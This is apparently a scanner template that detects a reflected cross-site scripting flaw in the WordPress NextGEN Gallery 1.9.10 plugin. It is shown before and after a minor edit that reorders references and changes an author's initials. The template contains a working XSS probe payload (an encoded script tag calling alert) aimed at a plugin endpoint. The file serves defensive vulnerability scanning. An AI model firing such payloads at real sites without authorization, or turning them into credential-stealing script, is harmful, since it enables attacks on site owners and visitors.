vulnerabilities/wordpress/wp-nextgen-xss.yaml (before)
id: wp-nextgen-xss

info:
  name: WordPress NextGEN Gallery 1.9.10 - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: WordPress NextGEN Gallery 1.9.10 plugin contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info
    - https://www.exploit-db.com/exploits/38178
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/23

vulnerabilities/wordpress/wp-nextgen-xss.yaml (after)
id: wp-nextgen-xss

info:
  name: WordPress NextGEN Gallery 1.9.10 - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: WordPress NextGEN Gallery 1.9.10 plugin contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.exploit-db.com/exploits/38178
    - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23

vulnerabilities/wordpress/wp-nextgen-xss.yaml (diff)
@@ -6,8 +6,8 @@ info:
   severity: high
   description: WordPress NextGEN Gallery 1.9.10 plugin contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
-    - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info
     - https://www.exploit-db.com/exploits/38178
+    - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 7.2
@@ -35,4 +35,4 @@ requests:
         status:
           - 200
 
-# Enhanced by md on 2022/09/23
+# Enhanced by mp on 2022/09/23
